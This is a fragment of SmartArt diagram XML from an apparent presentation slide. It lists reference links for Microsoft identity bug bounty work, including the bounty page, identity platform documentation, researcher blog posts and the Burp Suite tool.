    <dgm:cxn modelId="{FE3936D1-D654-4EF1-B13E-3EE380E20A2C}" type="presOf" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{15EBC3D9-D5DE-4D5F-8260-0A07FCEA65A8}" type="presOf" srcId="{9E132A39-3A0F-463C-B9D2-37708F071C0D}" destId="{39FE06F5-6607-41BE-80F5-8793E0934237}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2293ACEB-A967-417C-A3CF-099E49A765C2}" srcId="{5D9C61FD-91BD-4D59-9D55-CF4DE2AD6A00}" destId="{012262CE-4E19-4A36-AAED-F2C8ED18878A}" srcOrd="3" destOrd="0" parTransId="{0DFB6A7A-735E-4D60-A14E-3270EE4B00D9}" sibTransId="{536193F3-FE26-4900-88F5-3F8B63B7C4E7}"/>
    <dgm:cxn modelId="{F7EAC9F0-2AB2-4D7F-9495-F26E1032A827}" type="presOf" srcId="{EAC0DB36-A501-4F9D-9B38-5D87663473A9}" destId="{7CC3005C-8042-45C4-B29B-C9213E3F5810}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4F5EF477-F5CB-4B35-A225-41C41B984E57}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{B142B52B-C21C-4CE8-9A13-EB0D97E81E2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6ED1489F-889E-405C-B0B2-44102C81BDD3}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{91F1403D-6F37-4DCE-8F44-C25ED7416196}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{672F2D54-BF5C-40E7-953D-2478E29A60D4}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{A70D02A2-4EAD-4ED9-9245-3523013A27A4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B5E3261C-3B36-493B-BA61-BA968BBEB865}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{185AC4F1-178F-4CA2-A682-9382DD2E199B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1EF48051-8D18-49EB-83D3-E8F4C17CB1B9}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{8B2EA5D1-6A55-4120-8EFE-55F678EB0460}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1BC81BE7-9B48-4B82-BAAD-94436291489A}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{2ED3C05C-B75B-4382-BBE5-A241F607CA42}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{385B8C0C-EE67-4487-AC5C-82F01F4D9F1D}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{8AE191CF-738F-4394-B892-4889656B4E6B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1A5EDA5F-2A77-4626-8277-CAD0CE1E2112}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{AF729B40-6953-4B5C-B31F-BE299A2A436F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FCC1C5B6-18EE-4E59-97AA-05AD424904FC}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{3164AFEA-44ED-4F3F-A28D-69DAE11CEE64}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F37A7FCE-6DFD-4413-8E6B-DC011BBF7772}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{252AC061-5FD9-494C-99AF-AB17CF969483}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4F9BFFF6-1941-405F-A771-07DC8A7845E3}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{3C96BD6A-922B-492E-9BAF-1F2C6E4E8DFE}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{106B6B63-9A41-4B4A-B6FF-34770164FD33}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{1BA12E59-525E-4C01-BFE4-CEA218895137}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4630EEA-6A3D-40A2-B8F2-DA24A5E0B8B4}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{14A0AD6D-2E15-4748-A301-47CF80AC7D56}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{106E5175-A415-43F9-BBAB-ACE3E0BB5418}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{35F9C064-F2F7-48EE-ADB5-96985ADE5156}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F560F112-3372-4577-A3B6-39FC9471D8AE}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{636FD81F-F12E-4637-BEA5-CD949136F053}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA790701-92B9-4FAF-8874-3E1A5C2F9C92}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{BE6CA124-89CA-4B70-9CCA-058996FF38E9}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C6873130-0404-40A5-B3E7-10D6F0EF0B24}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{7CC3005C-8042-45C4-B29B-C9213E3F5810}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6F19AB6F-63F3-4C39-98DB-16FF1700DD94}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{23E31401-AA30-4B0E-BC5C-5CD6B623855F}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FF8BB7F1-88BA-4B5A-B0E7-4EF32B98A2EC}" type="presParOf" srcId="{D05BFAFE-CC4A-4459-93B2-9FA08B7E0BEC}" destId="{39FE06F5-6607-41BE-80F5-8793E0934237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673921-A559-4AAC-9D9A-E93D8FA1244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42AD69-E7B7-45AB-8B11-AEAF2C7BF2D3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" i="0" u="none" dirty="0"/>
            <a:t>Bounty</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B785C97-6AD2-4E13-BB6B-AE63CA4F06CA}" type="parTrans" cxnId="{E3CD031A-8FFF-460A-B068-38B698AF5177}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FD52F18-505B-4A84-86B6-49719D43AC5D}" type="sibTrans" cxnId="{E3CD031A-8FFF-460A-B068-38B698AF5177}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B89DBFC-9CF4-4793-A2C2-9F17C53EA345}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://www.microsoft.com/en-us/msrc/bounty-microsoft-identity</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03DD6CDD-E3B8-48AE-8EB1-5B2F53F3C2C5}" type="parTrans" cxnId="{C75973ED-250C-480B-B1DC-5351FEAD9A16}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12FDED5D-7A5F-4C90-8841-5FA641D43A9F}" type="sibTrans" cxnId="{C75973ED-250C-480B-B1DC-5351FEAD9A16}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8033EBB2-B4BA-4781-A121-486C21D809BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Identity documentations:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB9FED5C-C566-4611-8BB2-8F9059C4F4B1}" type="parTrans" cxnId="{A3183634-7F41-4B75-8554-AB0E953631A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25C7DE70-C2FA-4DDB-A9AF-6A02C13A8E6F}" type="sibTrans" cxnId="{A3183634-7F41-4B75-8554-AB0E953631A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A1ED4BF-6DA0-45CA-9F76-5061B656EF38}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://blogs.technet.microsoft.com/askpfeplat/2014/11/02/adfs-deep-dive-comparing-ws-fed-saml-and-oauth/</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7B4B1D5-CD24-4738-B64A-A8003F651388}" type="parTrans" cxnId="{30105AA9-03AA-4498-BBCA-756A8A713F26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D7C827B-A4C0-42D8-A134-9374079ECF6D}" type="sibTrans" cxnId="{30105AA9-03AA-4498-BBCA-756A8A713F26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCB493FC-5FCF-4329-BD03-4ADB5FBF230C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://docs.microsoft.com/en-us/azure/active-directory/develop/about-microsoft-identity-platform</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B63B766-F929-4A1D-AB33-53D4D70F9048}" type="parTrans" cxnId="{0177902A-80D8-4BE7-BBB9-5B22041079F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F255A019-A354-4C9C-9320-13E091331C53}" type="sibTrans" cxnId="{0177902A-80D8-4BE7-BBB9-5B22041079F2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEA570F7-315B-48BD-85D7-9CE5ADFC1972}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-overview</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76D6FBDE-CF0D-48A6-9294-F23AE9BFDABA}" type="parTrans" cxnId="{3705746A-D923-427C-A8AD-C5D36599C17B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C138EEEE-0972-4B7B-BB20-F49CC9BFC06B}" type="sibTrans" cxnId="{3705746A-D923-427C-A8AD-C5D36599C17B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Researcher Blogs:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{065DD719-793F-47D2-8C7D-717F8C0FD2F3}" type="parTrans" cxnId="{32CB2B91-7E6F-497E-A570-43DE84A05A23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE8958AC-1E53-47B6-A024-148112236EF3}" type="sibTrans" cxnId="{32CB2B91-7E6F-497E-A570-43DE84A05A23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C75D4E4F-81ED-4A6B-A53D-7EA812D75277}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57051721-DEF0-4876-82BB-F82B10279925}" type="parTrans" cxnId="{70754099-4A1F-4FDF-9413-AE332C2DC3A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22521149-AF27-466A-894C-9624CE962088}" type="sibTrans" cxnId="{70754099-4A1F-4FDF-9413-AE332C2DC3A1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CA17ED4-3E8D-47D3-8032-F231B18A620C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Tools</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3748163-1BBF-404A-BE7C-256060F3547E}" type="parTrans" cxnId="{C7EF50F3-B9A8-4DA9-880C-6B3C4F4BF18F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7169076-F7FB-4D7A-A4D1-F5C77CD9C375}" type="sibTrans" cxnId="{C7EF50F3-B9A8-4DA9-880C-6B3C4F4BF18F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B018DDB-4213-44E2-BBA9-47D1843C8479}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://portswigger.net/burp/</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E1EA750-AB76-4A51-B490-31612D305A78}" type="parTrans" cxnId="{F5E0E999-860A-484B-917C-D76764588242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B3F8ECF-062C-4576-8B73-D4129CE89FC3}" type="sibTrans" cxnId="{F5E0E999-860A-484B-917C-D76764588242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94A33CFF-5E57-483A-991A-DF93EBD44610}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>https://www.synack.com/blog/how-i-hacked-hotmail/</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC599C63-A4FB-40C3-A2C4-D600E62A20DA}" type="parTrans" cxnId="{4C6D9656-2D84-46E1-BE5D-17076B37B37A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81A82328-54DA-4B8E-8261-F1D498931F3E}" type="sibTrans" cxnId="{4C6D9656-2D84-46E1-BE5D-17076B37B37A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" type="pres">
      <dgm:prSet presAssocID="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8CC0F0A5-2849-438D-94EB-5A06F9724252}" type="pres">
      <dgm:prSet presAssocID="{CD42AD69-E7B7-45AB-8B11-AEAF2C7BF2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957B5B-EF00-4F5A-9B88-0FCCF6D1DA9F}" type="pres">
      <dgm:prSet presAssocID="{CD42AD69-E7B7-45AB-8B11-AEAF2C7BF2D3}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FECA41C5-644D-40D5-AE58-D9184AA13B22}" type="pres">
      <dgm:prSet presAssocID="{8033EBB2-B4BA-4781-A121-486C21D809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AF1DFE-7801-43EC-B237-17844554692D}" type="pres">
      <dgm:prSet presAssocID="{8033EBB2-B4BA-4781-A121-486C21D809BC}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF1FE438-EF30-4C3E-B69D-FE46BDE091A6}" type="pres">
      <dgm:prSet presAssocID="{97CA75A4-E38E-4891-9F51-BC5596B17B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24586E-9E84-476C-B7A5-607DA2F328F4}" type="pres">
      <dgm:prSet presAssocID="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}" presName="childText" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{807F0A2D-EAB9-4CF5-8AB6-E95CC03BDF48}" type="pres">
      <dgm:prSet presAssocID="{3CA17ED4-3E8D-47D3-8032-F231B18A62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0A76553-85D8-41E5-8500-2D684BD87C30}" type="pres">
      <dgm:prSet presAssocID="{3CA17ED4-3E8D-47D3-8032-F231B18A620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3CD031A-8FFF-460A-B068-38B698AF5177}" srcId="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" destId="{CD42AD69-E7B7-45AB-8B11-AEAF2C7BF2D3}" srcOrd="0" destOrd="0" parTransId="{9B785C97-6AD2-4E13-BB6B-AE63CA4F06CA}" sibTransId="{5FD52F18-505B-4A84-86B6-49719D43AC5D}"/>
    <dgm:cxn modelId="{0177902A-80D8-4BE7-BBB9-5B22041079F2}" srcId="{8033EBB2-B4BA-4781-A121-486C21D809BC}" destId="{DCB493FC-5FCF-4329-BD03-4ADB5FBF230C}" srcOrd="1" destOrd="0" parTransId="{5B63B766-F929-4A1D-AB33-53D4D70F9048}" sibTransId="{F255A019-A354-4C9C-9320-13E091331C53}"/>
    <dgm:cxn modelId="{A3183634-7F41-4B75-8554-AB0E953631A5}" srcId="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" destId="{8033EBB2-B4BA-4781-A121-486C21D809BC}" srcOrd="1" destOrd="0" parTransId="{FB9FED5C-C566-4611-8BB2-8F9059C4F4B1}" sibTransId="{25C7DE70-C2FA-4DDB-A9AF-6A02C13A8E6F}"/>
    <dgm:cxn modelId="{285FCB5D-B7CB-45DB-8164-35F2AE6A0C1E}" type="presOf" srcId="{CEA570F7-315B-48BD-85D7-9CE5ADFC1972}" destId="{FAAF1DFE-7801-43EC-B237-17844554692D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3705746A-D923-427C-A8AD-C5D36599C17B}" srcId="{8033EBB2-B4BA-4781-A121-486C21D809BC}" destId="{CEA570F7-315B-48BD-85D7-9CE5ADFC1972}" srcOrd="2" destOrd="0" parTransId="{76D6FBDE-CF0D-48A6-9294-F23AE9BFDABA}" sibTransId="{C138EEEE-0972-4B7B-BB20-F49CC9BFC06B}"/>
    <dgm:cxn modelId="{4A0E876C-C5D5-4202-83EB-BF7C921D74D0}" type="presOf" srcId="{5A1ED4BF-6DA0-45CA-9F76-5061B656EF38}" destId="{FAAF1DFE-7801-43EC-B237-17844554692D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E85DF26E-C54D-4585-ACC6-46DE18140D3D}" type="presOf" srcId="{8033EBB2-B4BA-4781-A121-486C21D809BC}" destId="{FECA41C5-644D-40D5-AE58-D9184AA13B22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{627DCB54-CDBC-494F-BB22-819777B93430}" type="presOf" srcId="{CD42AD69-E7B7-45AB-8B11-AEAF2C7BF2D3}" destId="{8CC0F0A5-2849-438D-94EB-5A06F9724252}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4C6D9656-2D84-46E1-BE5D-17076B37B37A}" srcId="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}" destId="{94A33CFF-5E57-483A-991A-DF93EBD44610}" srcOrd="1" destOrd="0" parTransId="{DC599C63-A4FB-40C3-A2C4-D600E62A20DA}" sibTransId="{81A82328-54DA-4B8E-8261-F1D498931F3E}"/>
    <dgm:cxn modelId="{AFAE2184-38CE-4A6A-8940-DACE205D8643}" type="presOf" srcId="{2B89DBFC-9CF4-4793-A2C2-9F17C53EA345}" destId="{5C957B5B-EF00-4F5A-9B88-0FCCF6D1DA9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8F06ED8D-EA02-4916-BDFA-48CA195C64B5}" type="presOf" srcId="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" destId="{BE2DB7BD-D449-47F8-A14B-A90CB3F7B91D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{32CB2B91-7E6F-497E-A570-43DE84A05A23}" srcId="{57673921-A559-4AAC-9D9A-E93D8FA1244E}" destId="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}" srcOrd="2" destOrd="0" parTransId="{065DD719-793F-47D2-8C7D-717F8C0FD2F3}" sibTransId="{FE8958AC-1E53-47B6-A024-148112236EF3}"/>
    <dgm:cxn modelId="{70754099-4A1F-4FDF-9413-AE332C2DC3A1}" srcId="{97CA75A4-E38E-4891-9F51-BC5596B17BEE}" destId="{C75D4E4F-81ED-4A6B-A53D-7EA812D75277}" srcOrd="0" destOrd="0" parTransId="{57051721-DEF0-4876-82BB-F82B10279925}" sibTransId="{22521149-AF27-466A-894C-9624CE962088}"/>
    <dgm:cxn modelId="{F5E0E999-860A-484B-917C-D76764588242}" srcId="{3CA17ED4-3E8D-47D3-8032-F231B18A620C}" destId="{4B018DDB-4213-44E2-BBA9-47D1843C8479}" srcOrd="0" destOrd="0" parTransId="{7E1EA750-AB76-4A51-B490-31612D305A78}" sibTransId="{8B3F8ECF-062C-4576-8B73-D4129CE89FC3}"/>
    <dgm:cxn modelId="{30105AA9-03AA-4498-BBCA-756A8A713F26}" srcId="{8033EBB2-B4BA-4781-A121-486C21D809BC}" destId="{5A1ED4BF-6DA0-45CA-9F76-5061B656EF38}" srcOrd="0" destOrd="0" parTransId="{C7B4B1D5-CD24-4738-B64A-A8003F651388}" sibTransId="{3D7C827B-A4C0-42D8-A134-9374079ECF6D}"/>
    <dgm:cxn modelId="{2AFFE1AC-1A03-401C-AB98-BAD1F3563A19}" type="presOf" srcId="{3CA17ED4-3E8D-47D3-8032-F231B18A620C}" destId="{807F0A2D-EAB9-4CF5-8AB6-E95CC03BDF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E2C16CB3-30D3-48B2-A186-E39FAFDE724F}" type="presOf" srcId="{DCB493FC-5FCF-4329-BD03-4ADB5FBF230C}" destId="{FAAF1DFE-7801-43EC-B237-17844554692D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B7FC66C3-9E8A-48F8-8E2C-3751162B10A8}" type="presOf" srcId="{4B018DDB-4213-44E2-BBA9-47D1843C8479}" destId="{70A76553-85D8-41E5-8500-2D684BD87C30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
